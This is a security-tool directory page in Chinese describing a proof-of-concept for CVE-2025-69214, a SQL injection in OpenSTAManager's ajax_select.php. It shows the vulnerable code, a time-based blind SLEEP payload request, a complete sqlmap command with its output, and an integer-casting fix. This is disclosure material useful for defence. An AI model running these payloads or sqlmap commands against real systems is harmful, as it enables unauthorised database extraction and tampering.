Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/lukasz-rybak/cve-2025-69214
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育数据库安全
GitHublukasz-rybak/cve-2025-69214

CVE-2025-69214

Proof-of-concept for CVE-2025-69214: SQL injection in OpenSTAManager's ajax_select.php componenti endpoint. Includes vulnerable code analysis, time-based blind exploitation with SQLMap, and remediation guidance.

查看仓库
35个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-69214:OpenSTAManager 在 ajax_select.php(componenti 端点)中存在 SQL 注入漏洞

概述

字段详细信息
CVE IDCVE-2025-69214
严重性高
公告查看公告
发现者Lukasz Rybak

受影响的产品

  • devcode-it/openstamanager(版本:<= 2.9.8)

CWE 分类

  • CWE-89:SQL 命令中特殊元素的不当中和('SQL 注入')

详情

摘要

ajax_select.php 端点在处理 componenti 操作时存在 SQL 注入漏洞。经过认证的攻击者可以通过 options[matricola] 参数注入恶意 SQL 代码。

概念验证

漏洞代码

文件: modules/impianti/ajax/select.php:122-124

root@kitploit:~
case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

数据流

  1. 来源: $_GET['options']['matricola'] → $superselect['matricola']
  2. 漏洞: 用户输入未经消毒直接拼接到 IN() 子句中
  3. 终点: 通过 AJAX 框架执行的查询

利用

手动 PoC(基于时间的盲 SQL 注入):

root@kitploit:~
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
image

SQLMap 利用:

root@kitploit:~
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

SQLMap 输出:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
image

影响

  • 数据泄露: 基于时间的盲 SQL 注入允许完全提取数据库
  • 认证绕过: 访问敏感组件和设备数据
  • 数据篡改: 可能未经授权修改记录

修复措施

在 SQL 中使用前将值转换为整数:

之前:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

之后:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}

致谢

发现者:Łukasz Rybak

参考资料

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69214
  • https://github.com/advisories/GHSA-qjv8-63xq-gq8m

免责声明

此 CVE 已按照协调漏洞披露实践进行负责任的披露。此处提供的信息仅供教育和防御用途。

下载工具